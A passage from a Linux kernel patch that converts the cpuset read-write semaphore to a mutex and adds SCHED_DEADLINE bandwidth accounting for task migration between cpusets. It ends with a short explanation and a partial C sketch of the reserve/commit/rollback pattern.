+ 		.needs_file = 1,
+diff --git a/kernel/cgroup/cgroup.c b/kernel/cgroup/cgroup.c
+index 73f11e4db3a4d..97ecca43386d9 100644
+--- a/kernel/cgroup/cgroup.c
++++ b/kernel/cgroup/cgroup.c
+@@ -57,6 +57,7 @@
+ #include <linux/file.h>
+ #include <linux/fs_parser.h>
+ #include <linux/sched/cputime.h>
++#include <linux/sched/deadline.h>
+ #include <linux/psi.h>
+ #include <net/sock.h>
+ 
+@@ -6681,6 +6682,9 @@ void cgroup_exit(struct task_struct *tsk)
+ 	list_add_tail(&tsk->cg_list, &cset->dying_tasks);
+ 	cset->nr_tasks--;
+ 
++	if (dl_task(tsk))
++		dec_dl_tasks_cs(tsk);
++
+ 	WARN_ON_ONCE(cgroup_task_frozen(tsk));
+ 	if (unlikely(!(tsk->flags & PF_KTHREAD) &&
+ 		     test_bit(CGRP_FREEZE, &task_dfl_cgroup(tsk)->flags)))
+diff --git a/kernel/cgroup/cpuset.c b/kernel/cgroup/cpuset.c
+index e276db7228451..db3e05b6b4dd2 100644
+--- a/kernel/cgroup/cpuset.c
++++ b/kernel/cgroup/cpuset.c
+@@ -193,6 +193,14 @@ struct cpuset {
+ 	int use_parent_ecpus;
+ 	int child_ecpus_count;
+ 
++	/*
++	 * number of SCHED_DEADLINE tasks attached to this cpuset, so that we
++	 * know when to rebuild associated root domain bandwidth information.
++	 */
++	int nr_deadline_tasks;
++	int nr_migrate_dl_tasks;
++	u64 sum_migrate_dl_bw;
++
+ 	/* Invalid partition error code, not lock protected */
+ 	enum prs_errcode prs_err;
+ 
+@@ -245,6 +253,20 @@ static inline struct cpuset *parent_cs(struct cpuset *cs)
+ 	return css_cs(cs->css.parent);
+ }
+ 
++void inc_dl_tasks_cs(struct task_struct *p)
++{
++	struct cpuset *cs = task_cs(p);
++
++	cs->nr_deadline_tasks++;
++}
++
++void dec_dl_tasks_cs(struct task_struct *p)
++{
++	struct cpuset *cs = task_cs(p);
++
++	cs->nr_deadline_tasks--;
++}
++
+ /* bits in struct cpuset flags field */
+ typedef enum {
+ 	CS_ONLINE,
+@@ -366,22 +388,23 @@ static struct cpuset top_cpuset = {
+ 		if (is_cpuset_online(((des_cs) = css_cs((pos_css)))))
+ 
+ /*
+- * There are two global locks guarding cpuset structures - cpuset_rwsem and
++ * There are two global locks guarding cpuset structures - cpuset_mutex and
+  * callback_lock. We also require taking task_lock() when dereferencing a
+  * task's cpuset pointer. See "The task_lock() exception", at the end of this
+- * comment.  The cpuset code uses only cpuset_rwsem write lock.  Other
+- * kernel subsystems can use cpuset_read_lock()/cpuset_read_unlock() to
+- * prevent change to cpuset structures.
++ * comment.  The cpuset code uses only cpuset_mutex. Other kernel subsystems
++ * can use cpuset_lock()/cpuset_unlock() to prevent change to cpuset
++ * structures. Note that cpuset_mutex needs to be a mutex as it is used in
++ * paths that rely on priority inheritance (e.g. scheduler - on RT) for
++ * correctness.
+  *
+  * A task must hold both locks to modify cpusets.  If a task holds
+- * cpuset_rwsem, it blocks others wanting that rwsem, ensuring that it
+- * is the only task able to also acquire callback_lock and be able to
+- * modify cpusets.  It can perform various checks on the cpuset structure
+- * first, knowing nothing will change.  It can also allocate memory while
+- * just holding cpuset_rwsem.  While it is performing these checks, various
+- * callback routines can briefly acquire callback_lock to query cpusets.
+- * Once it is ready to make the changes, it takes callback_lock, blocking
+- * everyone else.
++ * cpuset_mutex, it blocks others, ensuring that it is the only task able to
++ * also acquire callback_lock and be able to modify cpusets.  It can perform
++ * various checks on the cpuset structure first, knowing nothing will change.
++ * It can also allocate memory while just holding cpuset_mutex.  While it is
++ * performing these checks, various callback routines can briefly acquire
++ * callback_lock to query cpusets.  Once it is ready to make the changes, it
++ * takes callback_lock, blocking everyone else.
+  *
+  * Calls to the kernel memory allocator can not be made while holding
+  * callback_lock, as that would risk double tripping on callback_lock
+@@ -403,16 +426,16 @@ static struct cpuset top_cpuset = {
+  * guidelines for accessing subsystem state in kernel/cgroup.c
+  */
+ 
+-DEFINE_STATIC_PERCPU_RWSEM(cpuset_rwsem);
++static DEFINE_MUTEX(cpuset_mutex);
+ 
+-void cpuset_read_lock(void)
++void cpuset_lock(void)
+ {
+-	percpu_down_read(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ }
+ 
+-void cpuset_read_unlock(void)
++void cpuset_unlock(void)
+ {
+-	percpu_up_read(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ }
+ 
+ static DEFINE_SPINLOCK(callback_lock);
+@@ -496,7 +519,7 @@ static inline bool partition_is_populated(struct cpuset *cs,
+  * One way or another, we guarantee to return some non-empty subset
+  * of cpu_online_mask.
+  *
+- * Call with callback_lock or cpuset_rwsem held.
++ * Call with callback_lock or cpuset_mutex held.
+  */
+ static void guarantee_online_cpus(struct task_struct *tsk,
+ 				  struct cpumask *pmask)
+@@ -538,7 +561,7 @@ out_unlock:
+  * One way or another, we guarantee to return some non-empty subset
+  * of node_states[N_MEMORY].
+  *
+- * Call with callback_lock or cpuset_rwsem held.
++ * Call with callback_lock or cpuset_mutex held.
+  */
+ static void guarantee_online_mems(struct cpuset *cs, nodemask_t *pmask)
+ {
+@@ -550,7 +573,7 @@ static void guarantee_online_mems(struct cpuset *cs, nodemask_t *pmask)
+ /*
+  * update task's spread flag if cpuset's page/slab spread flag is set
+  *
+- * Call with callback_lock or cpuset_rwsem held. The check can be skipped
++ * Call with callback_lock or cpuset_mutex held. The check can be skipped
+  * if on default hierarchy.
+  */
+ static void cpuset_update_task_spread_flags(struct cpuset *cs,
+@@ -575,7 +598,7 @@ static void cpuset_update_task_spread_flags(struct cpuset *cs,
+  *
+  * One cpuset is a subset of another if all its allowed CPUs and
+  * Memory Nodes are a subset of the other, and its exclusive flags
+- * are only set if the other's are set.  Call holding cpuset_rwsem.
++ * are only set if the other's are set.  Call holding cpuset_mutex.
+  */
+ 
+ static int is_cpuset_subset(const struct cpuset *p, const struct cpuset *q)
+@@ -713,7 +736,7 @@ out:
+  * If we replaced the flag and mask values of the current cpuset
+  * (cur) with those values in the trial cpuset (trial), would
+  * our various subset and exclusive rules still be valid?  Presumes
+- * cpuset_rwsem held.
++ * cpuset_mutex held.
+  *
+  * 'cur' is the address of an actual, in-use cpuset.  Operations
+  * such as list traversal that depend on the actual address of the
+@@ -829,7 +852,7 @@ static void update_domain_attr_tree(struct sched_domain_attr *dattr,
+ 	rcu_read_unlock();
+ }
+ 
+-/* Must be called with cpuset_rwsem held.  */
++/* Must be called with cpuset_mutex held.  */
+ static inline int nr_cpusets(void)
+ {
+ 	/* jump label reference count + the top-level cpuset */
+@@ -855,7 +878,7 @@ static inline int nr_cpusets(void)
+  * domains when operating in the severe memory shortage situations
+  * that could cause allocation failures below.
+  *
+- * Must be called with cpuset_rwsem held.
++ * Must be called with cpuset_mutex held.
+  *
+  * The three key local variables below are:
+  *    cp - cpuset pointer, used (together with pos_css) to perform a
+@@ -1066,11 +1089,14 @@ done:
+ 	return ndoms;
+ }
+ 
+-static void update_tasks_root_domain(struct cpuset *cs)
++static void dl_update_tasks_root_domain(struct cpuset *cs)
+ {
+ 	struct css_task_iter it;
+ 	struct task_struct *task;
+ 
++	if (cs->nr_deadline_tasks == 0)
++		return;
++
+ 	css_task_iter_start(&cs->css, 0, &it);
+ 
+ 	while ((task = css_task_iter_next(&it)))
+@@ -1079,12 +1105,12 @@ static void update_tasks_root_domain(struct cpuset *cs)
+ 	css_task_iter_end(&it);
+ }
+ 
+-static void rebuild_root_domains(void)
++static void dl_rebuild_rd_accounting(void)
+ {
+ 	struct cpuset *cs = NULL;
+ 	struct cgroup_subsys_state *pos_css;
+ 
+-	percpu_rwsem_assert_held(&cpuset_rwsem);
++	lockdep_assert_held(&cpuset_mutex);
+ 	lockdep_assert_cpus_held();
+ 	lockdep_assert_held(&sched_domains_mutex);
+ 
+@@ -1107,7 +1133,7 @@ static void rebuild_root_domains(void)
+ 
+ 		rcu_read_unlock();
+ 
+-		update_tasks_root_domain(cs);
++		dl_update_tasks_root_domain(cs);
+ 
+ 		rcu_read_lock();
+ 		css_put(&cs->css);
+@@ -1121,7 +1147,7 @@ partition_and_rebuild_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
+ {
+ 	mutex_lock(&sched_domains_mutex);
+ 	partition_sched_domains_locked(ndoms_new, doms_new, dattr_new);
+-	rebuild_root_domains();
++	dl_rebuild_rd_accounting();
+ 	mutex_unlock(&sched_domains_mutex);
+ }
+ 
+@@ -1134,7 +1160,7 @@ partition_and_rebuild_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
+  * 'cpus' is removed, then call this routine to rebuild the
+  * scheduler's dynamic sched domains.
+  *
+- * Call with cpuset_rwsem held.  Takes cpus_read_lock().
++ * Call with cpuset_mutex held.  Takes cpus_read_lock().
+  */
+ static void rebuild_sched_domains_locked(void)
+ {
+@@ -1145,7 +1171,7 @@ static void rebuild_sched_domains_locked(void)
+ 	int ndoms;
+ 
+ 	lockdep_assert_cpus_held();
+-	percpu_rwsem_assert_held(&cpuset_rwsem);
++	lockdep_assert_held(&cpuset_mutex);
+ 
+ 	/*
+ 	 * If we have raced with CPU hotplug, return early to avoid
+@@ -1196,9 +1222,9 @@ static void rebuild_sched_domains_locked(void)
+ void rebuild_sched_domains(void)
+ {
+ 	cpus_read_lock();
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 	rebuild_sched_domains_locked();
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ 	cpus_read_unlock();
+ }
+ 
+@@ -1208,7 +1234,7 @@ void rebuild_sched_domains(void)
+  * @new_cpus: the temp variable for the new effective_cpus mask
+  *
+  * Iterate through each task of @cs updating its cpus_allowed to the
+- * effective cpuset's.  As this function is called with cpuset_rwsem held,
++ * effective cpuset's.  As this function is called with cpuset_mutex held,
+  * cpuset membership stays stable.
+  */
+ static void update_tasks_cpumask(struct cpuset *cs, struct cpumask *new_cpus)
+@@ -1317,7 +1343,7 @@ static int update_parent_subparts_cpumask(struct cpuset *cs, int cmd,
+ 	int old_prs, new_prs;
+ 	int part_error = PERR_NONE;	/* Partition error? */
+ 
+-	percpu_rwsem_assert_held(&cpuset_rwsem);
++	lockdep_assert_held(&cpuset_mutex);
+ 
+ 	/*
+ 	 * The parent must be a partition root.
+@@ -1540,7 +1566,7 @@ static int update_parent_subparts_cpumask(struct cpuset *cs, int cmd,
+  *
+  * On legacy hierarchy, effective_cpus will be the same with cpu_allowed.
+  *
+- * Called with cpuset_rwsem held
++ * Called with cpuset_mutex held
+  */
+ static void update_cpumasks_hier(struct cpuset *cs, struct tmpmasks *tmp,
+ 				 bool force)
+@@ -1700,7 +1726,7 @@ static void update_sibling_cpumasks(struct cpuset *parent, struct cpuset *cs,
+ 	struct cpuset *sibling;
+ 	struct cgroup_subsys_state *pos_css;
+ 
+-	percpu_rwsem_assert_held(&cpuset_rwsem);
++	lockdep_assert_held(&cpuset_mutex);
+ 
+ 	/*
+ 	 * Check all its siblings and call update_cpumasks_hier()
+@@ -1950,12 +1976,12 @@ static void *cpuset_being_rebound;
+  * @cs: the cpuset in which each task's mems_allowed mask needs to be changed
+  *
+  * Iterate through each task of @cs updating its mems_allowed to the
+- * effective cpuset's.  As this function is called with cpuset_rwsem held,
++ * effective cpuset's.  As this function is called with cpuset_mutex held,
+  * cpuset membership stays stable.
+  */
+ static void update_tasks_nodemask(struct cpuset *cs)
+ {
+-	static nodemask_t newmems;	/* protected by cpuset_rwsem */
++	static nodemask_t newmems;	/* protected by cpuset_mutex */
+ 	struct css_task_iter it;
+ 	struct task_struct *task;
+ 
+@@ -1968,7 +1994,7 @@ static void update_tasks_nodemask(struct cpuset *cs)
+ 	 * take while holding tasklist_lock.  Forks can happen - the
+ 	 * mpol_dup() cpuset_being_rebound check will catch such forks,
+ 	 * and rebind their vma mempolicies too.  Because we still hold
+-	 * the global cpuset_rwsem, we know that no other rebind effort
++	 * the global cpuset_mutex, we know that no other rebind effort
+ 	 * will be contending for the global variable cpuset_being_rebound.
+ 	 * It's ok if we rebind the same mm twice; mpol_rebind_mm()
+ 	 * is idempotent.  Also migrate pages in each mm to new nodes.
+@@ -2014,7 +2040,7 @@ static void update_tasks_nodemask(struct cpuset *cs)
+  *
+  * On legacy hierarchy, effective_mems will be the same with mems_allowed.
+  *
+- * Called with cpuset_rwsem held
++ * Called with cpuset_mutex held
+  */
+ static void update_nodemasks_hier(struct cpuset *cs, nodemask_t *new_mems)
+ {
+@@ -2067,7 +2093,7 @@ static void update_nodemasks_hier(struct cpuset *cs, nodemask_t *new_mems)
+  * mempolicies and if the cpuset is marked 'memory_migrate',
+  * migrate the tasks pages to the new memory.
+  *
+- * Call with cpuset_rwsem held. May take callback_lock during call.
++ * Call with cpuset_mutex held. May take callback_lock during call.
+  * Will take tasklist_lock, scan tasklist for tasks in cpuset cs,
+  * lock each such tasks mm->mmap_lock, scan its vma's and rebind
+  * their mempolicies to the cpusets new mems_allowed.
+@@ -2159,7 +2185,7 @@ static int update_relax_domain_level(struct cpuset *cs, s64 val)
+  * @cs: the cpuset in which each task's spread flags needs to be changed
+  *
+  * Iterate through each task of @cs updating its spread flags.  As this
+- * function is called with cpuset_rwsem held, cpuset membership stays
++ * function is called with cpuset_mutex held, cpuset membership stays
+  * stable.
+  */
+ static void update_tasks_flags(struct cpuset *cs)
+@@ -2179,7 +2205,7 @@ static void update_tasks_flags(struct cpuset *cs)
+  * cs:		the cpuset to update
+  * turning_on: 	whether the flag is being set or cleared
+  *
+- * Call with cpuset_rwsem held.
++ * Call with cpuset_mutex held.
+  */
+ 
+ static int update_flag(cpuset_flagbits_t bit, struct cpuset *cs,
+@@ -2229,7 +2255,7 @@ out:
+  * @new_prs: new partition root state
+  * Return: 0 if successful, != 0 if error
+  *
+- * Call with cpuset_rwsem held.
++ * Call with cpuset_mutex held.
+  */
+ static int update_prstate(struct cpuset *cs, int new_prs)
+ {
+@@ -2467,19 +2493,26 @@ static int cpuset_can_attach_check(struct cpuset *cs)
+ 	return 0;
+ }
+ 
+-/* Called by cgroups to determine if a cpuset is usable; cpuset_rwsem held */
++static void reset_migrate_dl_data(struct cpuset *cs)
++{
++	cs->nr_migrate_dl_tasks = 0;
++	cs->sum_migrate_dl_bw = 0;
++}
++
++/* Called by cgroups to determine if a cpuset is usable; cpuset_mutex held */
+ static int cpuset_can_attach(struct cgroup_taskset *tset)
+ {
+ 	struct cgroup_subsys_state *css;
+-	struct cpuset *cs;
++	struct cpuset *cs, *oldcs;
+ 	struct task_struct *task;
+ 	int ret;
+ 
+ 	/* used later by cpuset_attach() */
+ 	cpuset_attach_old_cs = task_cs(cgroup_taskset_first(tset, &css));
++	oldcs = cpuset_attach_old_cs;
+ 	cs = css_cs(css);
+ 
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 
+ 	/* Check to see if task is allowed in the cpuset */
+ 	ret = cpuset_can_attach_check(cs);
+@@ -2487,21 +2520,46 @@ static int cpuset_can_attach(struct cgroup_taskset *tset)
+ 		goto out_unlock;
+ 
+ 	cgroup_taskset_for_each(task, css, tset) {
+-		ret = task_can_attach(task, cs->effective_cpus);
++		ret = task_can_attach(task);
+ 		if (ret)
+ 			goto out_unlock;
+ 		ret = security_task_setscheduler(task);
+ 		if (ret)
+ 			goto out_unlock;
++
++		if (dl_task(task)) {
++			cs->nr_migrate_dl_tasks++;
++			cs->sum_migrate_dl_bw += task->dl.dl_bw;
++		}
+ 	}
+ 
++	if (!cs->nr_migrate_dl_tasks)
++		goto out_success;
++
++	if (!cpumask_intersects(oldcs->effective_cpus, cs->effective_cpus)) {
++		int cpu = cpumask_any_and(cpu_active_mask, cs->effective_cpus);
++
++		if (unlikely(cpu >= nr_cpu_ids)) {
++			reset_migrate_dl_data(cs);
++			ret = -EINVAL;
++			goto out_unlock;
++		}
++
++		ret = dl_bw_alloc(cpu, cs->sum_migrate_dl_bw);
++		if (ret) {
++			reset_migrate_dl_data(cs);
++			goto out_unlock;
++		}
++	}
++
++out_success:
+ 	/*
+ 	 * Mark attach is in progress.  This makes validate_change() fail
+ 	 * changes which zero cpus/mems_allowed.
+ 	 */
+ 	cs->attach_in_progress++;
+ out_unlock:
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ 	return ret;
+ }
+ 
+@@ -2513,15 +2571,23 @@ static void cpuset_cancel_attach(struct cgroup_taskset *tset)
+ 	cgroup_taskset_first(tset, &css);
+ 	cs = css_cs(css);
+ 
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 	cs->attach_in_progress--;
+ 	if (!cs->attach_in_progress)
+ 		wake_up(&cpuset_attach_wq);
+-	percpu_up_write(&cpuset_rwsem);
++
++	if (cs->nr_migrate_dl_tasks) {
++		int cpu = cpumask_any(cs->effective_cpus);
++
++		dl_bw_free(cpu, cs->sum_migrate_dl_bw);
++		reset_migrate_dl_data(cs);
++	}
++
++	mutex_unlock(&cpuset_mutex);
+ }
+ 
+ /*
+- * Protected by cpuset_rwsem. cpus_attach is used only by cpuset_attach_task()
++ * Protected by cpuset_mutex. cpus_attach is used only by cpuset_attach_task()
+  * but we can't allocate it dynamically there.  Define it global and
+  * allocate from cpuset_init().
+  */
+@@ -2530,7 +2596,7 @@ static nodemask_t cpuset_attach_nodemask_to;
+ 
+ static void cpuset_attach_task(struct cpuset *cs, struct task_struct *task)
+ {
+-	percpu_rwsem_assert_held(&cpuset_rwsem);
++	lockdep_assert_held(&cpuset_mutex);
+ 
+ 	if (cs != &top_cpuset)
+ 		guarantee_online_cpus(task, cpus_attach);
+@@ -2558,7 +2624,7 @@ static void cpuset_attach(struct cgroup_taskset *tset)
+ 	cs = css_cs(css);
+ 
+ 	lockdep_assert_cpus_held();	/* see cgroup_attach_lock() */
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 
+ 	guarantee_online_mems(cs, &cpuset_attach_nodemask_to);
+ 
+@@ -2594,11 +2660,17 @@ static void cpuset_attach(struct cgroup_taskset *tset)
+ 
+ 	cs->old_mems_allowed = cpuset_attach_nodemask_to;
+ 
++	if (cs->nr_migrate_dl_tasks) {
++		cs->nr_deadline_tasks += cs->nr_migrate_dl_tasks;
++		oldcs->nr_deadline_tasks -= cs->nr_migrate_dl_tasks;
++		reset_migrate_dl_data(cs);
++	}
++
+ 	cs->attach_in_progress--;
+ 	if (!cs->attach_in_progress)
+ 		wake_up(&cpuset_attach_wq);
+ 
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ }
+ 
+ /* The various types of files and directories in a cpuset file system */
+@@ -2630,7 +2702,7 @@ static int cpuset_write_u64(struct cgroup_subsys_state *css, struct cftype *cft,
+ 	int retval = 0;
+ 
+ 	cpus_read_lock();
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 	if (!is_cpuset_online(cs)) {
+ 		retval = -ENODEV;
+ 		goto out_unlock;
+@@ -2666,7 +2738,7 @@ static int cpuset_write_u64(struct cgroup_subsys_state *css, struct cftype *cft,
+ 		break;
+ 	}
+ out_unlock:
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ 	cpus_read_unlock();
+ 	return retval;
+ }
+@@ -2679,7 +2751,7 @@ static int cpuset_write_s64(struct cgroup_subsys_state *css, struct cftype *cft,
+ 	int retval = -ENODEV;
+ 
+ 	cpus_read_lock();
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 	if (!is_cpuset_online(cs))
+ 		goto out_unlock;
+ 
+@@ -2692,7 +2764,7 @@ static int cpuset_write_s64(struct cgroup_subsys_state *css, struct cftype *cft,
+ 		break;
+ 	}
+ out_unlock:
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ 	cpus_read_unlock();
+ 	return retval;
+ }
+@@ -2725,7 +2797,7 @@ static ssize_t cpuset_write_resmask(struct kernfs_open_file *of,
+ 	 * operation like this one can lead to a deadlock through kernfs
+ 	 * active_ref protection.  Let's break the protection.  Losing the
+ 	 * protection is okay as we check whether @cs is online after
+-	 * grabbing cpuset_rwsem anyway.  This only happens on the legacy
++	 * grabbing cpuset_mutex anyway.  This only happens on the legacy
+ 	 * hierarchies.
+ 	 */
+ 	css_get(&cs->css);
+@@ -2733,7 +2805,7 @@ static ssize_t cpuset_write_resmask(struct kernfs_open_file *of,
+ 	flush_work(&cpuset_hotplug_work);
+ 
+ 	cpus_read_lock();
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 	if (!is_cpuset_online(cs))
+ 		goto out_unlock;
+ 
+@@ -2757,7 +2829,7 @@ static ssize_t cpuset_write_resmask(struct kernfs_open_file *of,
+ 
+ 	free_cpuset(trialcs);
+ out_unlock:
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ 	cpus_read_unlock();
+ 	kernfs_unbreak_active_protection(of->kn);
+ 	css_put(&cs->css);
+@@ -2905,13 +2977,13 @@ static ssize_t sched_partition_write(struct kernfs_open_file *of, char *buf,
+ 
+ 	css_get(&cs->css);
+ 	cpus_read_lock();
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 	if (!is_cpuset_online(cs))
+ 		goto out_unlock;
+ 
+ 	retval = update_prstate(cs, val);
+ out_unlock:
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ 	cpus_read_unlock();
+ 	css_put(&cs->css);
+ 	return retval ?: nbytes;
+@@ -3124,7 +3196,7 @@ static int cpuset_css_online(struct cgroup_subsys_state *css)
+ 		return 0;
+ 
+ 	cpus_read_lock();
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 
+ 	set_bit(CS_ONLINE, &cs->flags);
+ 	if (is_spread_page(parent))
+@@ -3175,7 +3247,7 @@ static int cpuset_css_online(struct cgroup_subsys_state *css)
+ 	cpumask_copy(cs->effective_cpus, parent->cpus_allowed);
+ 	spin_unlock_irq(&callback_lock);
+ out_unlock:
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ 	cpus_read_unlock();
+ 	return 0;
+ }
+@@ -3196,7 +3268,7 @@ static void cpuset_css_offline(struct cgroup_subsys_state *css)
+ 	struct cpuset *cs = css_cs(css);
+ 
+ 	cpus_read_lock();
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 
+ 	if (is_partition_valid(cs))
+ 		update_prstate(cs, 0);
+@@ -3215,7 +3287,7 @@ static void cpuset_css_offline(struct cgroup_subsys_state *css)
+ 	cpuset_dec();
+ 	clear_bit(CS_ONLINE, &cs->flags);
+ 
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ 	cpus_read_unlock();
+ }
+ 
+@@ -3228,7 +3300,7 @@ static void cpuset_css_free(struct cgroup_subsys_state *css)
+ 
+ static void cpuset_bind(struct cgroup_subsys_state *root_css)
+ {
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 	spin_lock_irq(&callback_lock);
+ 
+ 	if (is_in_v2_mode()) {
+@@ -3241,7 +3313,7 @@ static void cpuset_bind(struct cgroup_subsys_state *root_css)
+ 	}
+ 
+ 	spin_unlock_irq(&callback_lock);
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ }
+ 
+ /*
+@@ -3262,14 +3334,14 @@ static int cpuset_can_fork(struct task_struct *task, struct css_set *cset)
+ 		return 0;
+ 
+ 	lockdep_assert_held(&cgroup_mutex);
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 
+ 	/* Check to see if task is allowed in the cpuset */
+ 	ret = cpuset_can_attach_check(cs);
+ 	if (ret)
+ 		goto out_unlock;
+ 
+-	ret = task_can_attach(task, cs->effective_cpus);
++	ret = task_can_attach(task);
+ 	if (ret)
+ 		goto out_unlock;
+ 
+@@ -3283,7 +3355,7 @@ static int cpuset_can_fork(struct task_struct *task, struct css_set *cset)
+ 	 */
+ 	cs->attach_in_progress++;
+ out_unlock:
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ 	return ret;
+ }
+ 
+@@ -3299,11 +3371,11 @@ static void cpuset_cancel_fork(struct task_struct *task, struct css_set *cset)
+ 	if (same_cs)
+ 		return;
+ 
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 	cs->attach_in_progress--;
+ 	if (!cs->attach_in_progress)
+ 		wake_up(&cpuset_attach_wq);
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ }
+ 
+ /*
+@@ -3331,7 +3403,7 @@ static void cpuset_fork(struct task_struct *task)
+ 	}
+ 
+ 	/* CLONE_INTO_CGROUP */
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 	guarantee_online_mems(cs, &cpuset_attach_nodemask_to);
+ 	cpuset_attach_task(cs, task);
+ 
+@@ -3339,7 +3411,7 @@ static void cpuset_fork(struct task_struct *task)
+ 	if (!cs->attach_in_progress)
+ 		wake_up(&cpuset_attach_wq);
+ 
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ }
+ 
+ struct cgroup_subsys cpuset_cgrp_subsys = {
+@@ -3369,8 +3441,6 @@ struct cgroup_subsys cpuset_cgrp_subsys = {
+ 
+ int __init cpuset_init(void)
+ {
+-	BUG_ON(percpu_init_rwsem(&cpuset_rwsem));
+-
+ 	BUG_ON(!alloc_cpumask_var(&top_cpuset.cpus_allowed, GFP_KERNEL));
+ 	BUG_ON(!alloc_cpumask_var(&top_cpuset.effective_cpus, GFP_KERNEL));
+ 	BUG_ON(!zalloc_cpumask_var(&top_cpuset.subparts_cpus, GFP_KERNEL));
+@@ -3442,7 +3512,7 @@ hotplug_update_tasks_legacy(struct cpuset *cs,
+ 	is_empty = cpumask_empty(cs->cpus_allowed) ||
+ 		   nodes_empty(cs->mems_allowed);
+ 
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ 
+ 	/*
+ 	 * Move tasks to the nearest ancestor with execution resources,
+@@ -3452,7 +3522,7 @@ hotplug_update_tasks_legacy(struct cpuset *cs,
+ 	if (is_empty)
+ 		remove_tasks_in_empty_cpuset(cs);
+ 
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ }
+ 
+ static void
+@@ -3503,14 +3573,14 @@ static void cpuset_hotplug_update_tasks(struct cpuset *cs, struct tmpmasks *tmp)
+ retry:
+ 	wait_event(cpuset_attach_wq, cs->attach_in_progress == 0);
+ 
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 
+ 	/*
+ 	 * We have raced with task attaching. We wait until attaching
+ 	 * is finished, so we won't attach a task to an empty cpuset.
+ 	 */
+ 	if (cs->attach_in_progress) {
+-		percpu_up_write(&cpuset_rwsem);
++		mutex_unlock(&cpuset_mutex);
+ 		goto retry;
+ 	}
+ 
+@@ -3604,7 +3674,7 @@ update_tasks:
+ 		hotplug_update_tasks_legacy(cs, &new_cpus, &new_mems,
+ 					    cpus_updated, mems_updated);
+ 
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ }
+ 
+ /**
+@@ -3634,7 +3704,7 @@ static void cpuset_hotplug_workfn(struct work_struct *work)
+ 	if (on_dfl && !alloc_cpumasks(NULL, &tmp))
+ 		ptmp = &tmp;
+ 
+-	percpu_down_write(&cpuset_rwsem);
++	mutex_lock(&cpuset_mutex);
+ 
+ 	/* fetch the available cpus/mems and find out which changed how */
+ 	cpumask_copy(&new_cpus, cpu_active_mask);
+@@ -3691,7 +3761,7 @@ static void cpuset_hotplug_workfn(struct work_struct *work)
+ 		update_tasks_nodemask(&top_cpuset);
+ 	}
+ 
+-	percpu_up_write(&cpuset_rwsem);
++	mutex_unlock(&cpuset_mutex);
+ 
+ 	/* if cpus or mems changed, we need to propagate to descendants */
+ 	if (cpus_updated || mems_updated) {
+@@ -4101,7 +4171,7 @@ void __cpuset_memory_pressure_bump(void)
+  *  - Used for /proc/<pid>/cpuset.
+  *  - No need to task_lock(tsk) on this tsk->cpuset reference, as it
+  *    doesn't really matter if tsk->cpuset changes after we read it,
+- *    and we take cpuset_rwsem, keeping cpuset_attach() from changing it
++ *    and we take cpuset_mutex, keeping cpuset_attach() from changing it
+  *    anyway.
+  */
+ int proc_cpuset_show(struct seq_file *m, struct pid_namespace *ns,
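
Two themes run through the cpuset hunks above: cpuset_rwsem becomes a plain mutex, a sleeping lock that supports priority inheritance on RT, and SCHED_DEADLINE migration gains two-phase accounting, where cpuset_can_attach() reserves bandwidth, cpuset_attach() commits the counters, and cpuset_cancel_attach() rolls the reservation back. A simplified sketch of that reserve/commit/rollback shape, with stand-in types rather than the kernel structures:

    #include <stdint.h>

    struct bwpool { uint64_t total, used; };
    struct cs { int nr_dl; int nr_migrate; uint64_t migrate_bw; };

    static int reserve(struct bwpool *p, uint64_t bw)
    {
            if (p->used + bw > p->total)
                    return -1;        /* -EBUSY upstream */
            p->used += bw;            /* can't fail after this point */
            return 0;
    }

    static int can_attach(struct bwpool *p, struct cs *dst, int n, uint64_t bw)
    {
            if (reserve(p, bw))       /* phase 1: reserve, may fail */
                    return -1;
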